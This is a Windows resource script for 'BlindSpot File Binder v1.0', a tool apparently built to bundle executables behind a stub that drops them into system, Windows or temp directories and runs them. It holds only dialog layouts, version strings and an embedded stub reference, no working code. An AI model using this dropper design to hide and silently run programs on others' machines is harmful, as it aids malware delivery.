//Microsoft Developer Studio generated resource script.
//
#include "resource.h"

#define APSTUDIO_READONLY_SYMBOLS
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 2 resource.
//
#include "afxres.h"

/////////////////////////////////////////////////////////////////////////////
#undef APSTUDIO_READONLY_SYMBOLS

/////////////////////////////////////////////////////////////////////////////
// English (Canada) resources

#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENC)
#ifdef _WIN32
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_CAN
#pragma code_page(1252)
#endif //_WIN32

#ifdef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// TEXTINCLUDE
//

1 TEXTINCLUDE DISCARDABLE 
BEGIN
    "resource.h\0"
END

2 TEXTINCLUDE DISCARDABLE 
BEGIN
    "#include ""afxres.h""\r\n"
    "\0"
END

3 TEXTINCLUDE DISCARDABLE 
BEGIN
    "\r\n"
    "\0"
END

#endif    // APSTUDIO_INVOKED


/////////////////////////////////////////////////////////////////////////////
//
// Dialog
//

IDD_DIALOG DIALOGEX 0, 0, 316, 78
STYLE DS_MODALFRAME | WS_MINIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "BlindSpot v1.0"
FONT 8, "MS Sans Serif", 0, 0, 0x1
BEGIN
    CONTROL         "List1",IDC_LIST,"SysListView32",LVS_REPORT | 
                    LVS_ALIGNLEFT | WS_BORDER | WS_TABSTOP,0,0,316,78,
                    WS_EX_CLIENTEDGE
END

IDD_DIALOG_ADD DIALOG DISCARDABLE  0, 0, 149, 86
STYLE DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION "Add"
FONT 8, "MS Sans Serif"
BEGIN
    DEFPUSHBUTTON   "OK",IDOK,22,67,50,14
    PUSHBUTTON      "Cancel",IDCANCEL,77,67,50,14
    CONTROL         "&Would you like the stub to run this file?",
                    IDC_CHECK_RUN,"Button",BS_AUTOCHECKBOX | BS_LEFTTEXT | 
                    WS_TABSTOP,5,4,137,10
    GROUPBOX        "Installation",IDC_STATIC,6,16,137,47
    CONTROL         "&System Directory",IDC_RADIO_SYSDIR,"Button",
                    BS_AUTORADIOBUTTON,11,26,69,10
    CONTROL         "Wi&ndows Directory",IDC_RADIO_WINDIR,"Button",
                    BS_AUTORADIOBUTTON | WS_GROUP,11,48,75,10
    CONTROL         "&Temporary Directory",IDC_RADIO_TMPDIR,"Button",
                    BS_AUTORADIOBUTTON,11,37,79,10
END


/////////////////////////////////////////////////////////////////////////////
//
// Icon
//

// Icon with lowest ID value placed first to ensure application icon
// remains consistent on all systems.
IDI_ICON                ICON    DISCARDABLE     "wi0124-32.ico"

#ifndef _MAC
/////////////////////////////////////////////////////////////////////////////
//
// Version
//

VS_VERSION_INFO VERSIONINFO
 FILEVERSION 1,0,0,0
 PRODUCTVERSION 1,0,0,0
 FILEFLAGSMASK 0x3fL
#ifdef _DEBUG
 FILEFLAGS 0x1L
#else
 FILEFLAGS 0x0L
#endif
 FILEOS 0x40004L
 FILETYPE 0x1L
 FILESUBTYPE 0x0L
BEGIN
    BLOCK "StringFileInfo"
    BEGIN
        BLOCK "100904b0"
        BEGIN
            VALUE "Comments", "\0"
            VALUE "CompanyName", " By: s134k\0"
            VALUE "FileDescription", "BlindSpot File Binder v1.0\0"
            VALUE "FileVersion", "1, 0, 0, 0\0"
            VALUE "InternalName", "BlindSpot\0"
            VALUE "LegalCopyright", "Copyright © 2006\0"
            VALUE "LegalTrademarks", "\0"
            VALUE "OriginalFilename", "BlindSpot.exe\0"
            VALUE "PrivateBuild", "\0"
            VALUE "ProductName", "  BlindSpot\0"
            VALUE "ProductVersion", "1, 0, 0, 0\0"
            VALUE "SpecialBuild", "\0"
        END
    END
    BLOCK "VarFileInfo"
    BEGIN
        VALUE "Translation", 0x1009, 1200
    END
END

#endif    // !_MAC


/////////////////////////////////////////////////////////////////////////////
//
// RT_EXE
//

IDR_RT_EXE              RT_EXE  DISCARDABLE     "stub\\Release\\stub.exe"
#endif    // English (Canada) resources
/////////////////////////////////////////////////////////////////////////////



#ifndef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 3 resource.
//


/////////////////////////////////////////////////////////////////////////////
#endif    // not APSTUDIO_INVOKED

